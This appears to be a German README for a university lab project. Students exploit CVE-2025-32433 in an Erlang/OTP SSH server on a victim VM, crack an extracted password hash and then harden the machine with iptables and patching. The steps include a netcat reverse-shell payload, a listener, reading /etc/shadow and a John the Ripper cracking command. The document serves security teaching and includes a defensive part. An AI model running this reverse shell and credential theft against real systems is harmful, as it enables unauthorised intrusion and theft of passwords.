
Dieses Projekt simuliert ein realistisches Angriffs- und Verteidigungsszenario über zwei virtuelle Maschinen hinweg. Sie werden eine kritische Pre-Authentifizierungs-RCE-Schwachstelle (CVE-2025-32433) in einem Erlang/OTP SSH-Server ausnutzen, extrahierte Passwort-Hashes knacken und schließlich die Opfermaschine mit Firewall-Regeln und Patchen härten.
Gesamtpunkte: 20 | Abgabetermin: Keine verspäteten Abgaben akzeptiert
Dieses Projekt simuliert ein reales Angriffs- und Verteidigungsszenario über zwei virtuelle Maschinen. Sie werden eine kritische Pre-Authentication RCE-Sicherheitslücke (CVE-2025-32433) in einem Erlang/OTP SSH-Server ausnutzen, extrahierte Passwort-Hashes knacken und dann die Opfermaschine mit Firewall-Regeln und Patches härten.
| Rolle | Betriebssystem |
|---|---|
| Angreifer | Kali Linux |
| Opfer | Ubuntu/Debian (Erlang/OTP SSH v27.3.2) |
| Datei | Beschreibung |
|---|---|
Debian-1.ova | Vorgefertigtes Opfer-VM-Image — separat herunterladen, siehe Ressourcen (zu groß für GitHub) |
Debian-1.ova): Download-Link — zu groß (~3 GB) für GitHub. Separat herunterladen und wie unten beschrieben in VirtualBox/VMware importieren.rockyou_txt.txt): in diesem Repository enthalten, wird für den Passwort-Knack-Schritt in Teil 2 verwendet.Debian-1.ova und Ihre Kali Linux VM in VirtualBox/VMware laden.ifconfig ausführen, um ihre IP zu finden (normalerweise in 192.168.56.0/24).nmap -p 2222 -sV -A <Opfer-IP>
Offene Ports, Dienstversionen und Erlang-Signaturen dokumentieren.
Kali vorübergehend auf NAT umstellen, um das Repo zu klonen, dann zurück zu Host-Only.
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py
Das Skript bearbeiten — HOST = "<Opfer-IP>" setzen und den Payload aktualisieren:
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'
Terminal 1 (Kali) — Listener starten:
nc -lvnp 4444
Terminal 2 (Kali) — Exploit starten:
python3 CVE-2025-32433.py
In der Reverse Shell whoami und hostname ausführen, um den Zugriff zu bestätigen.
# Auf dem Opfer (via Reverse Shell)
cat /etc/shadow | grep testuser > hash.txt
# Auf Kali
john --wordlist=rockyou_txt.txt hash.txt
Das Hash-Format dokumentieren (z. B. $6$ = SHA-512), benötigte Zeit und das wiederhergestellte Klartext-Passwort.
find / -iname "flag.txt" 2>/dev/null
cat /pfad/zu/flag.txt
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP
Den Nmap-Scan und den Exploit von Kali aus erneut ausführen — dokumentieren, dass Port 2222 jetzt "Filtered" ist und der Exploit fehlschlägt.
Die Schritte dokumentieren, um Erlang/OTP auf v27.3.3 oder neuer zu aktualisieren, das den Fix für CVE-2025-32433 enthält.
whoami/hostname), Flaggen-ErfassungCVE-2025-32433 — Kritische Pre-Authentication Remote Code Execution im Erlang/OTP SSH-Server. Ausnutzbar durch das Senden manipulierter SSH-Pakete vor jeglichem Credential-Austausch, wodurch ein nicht authentifizierter Angreifer vollen Shell-Zugriff erhält.
Project Spring 2026 - Google Docs.pdf | Vollständige Projektanleitung mit abzugebenden Ergebnissen |
rockyou_txt.txt | Wortliste, die mit John the Ripper zum Knacken des extrahierten Passwort-Hashes verwendet wird |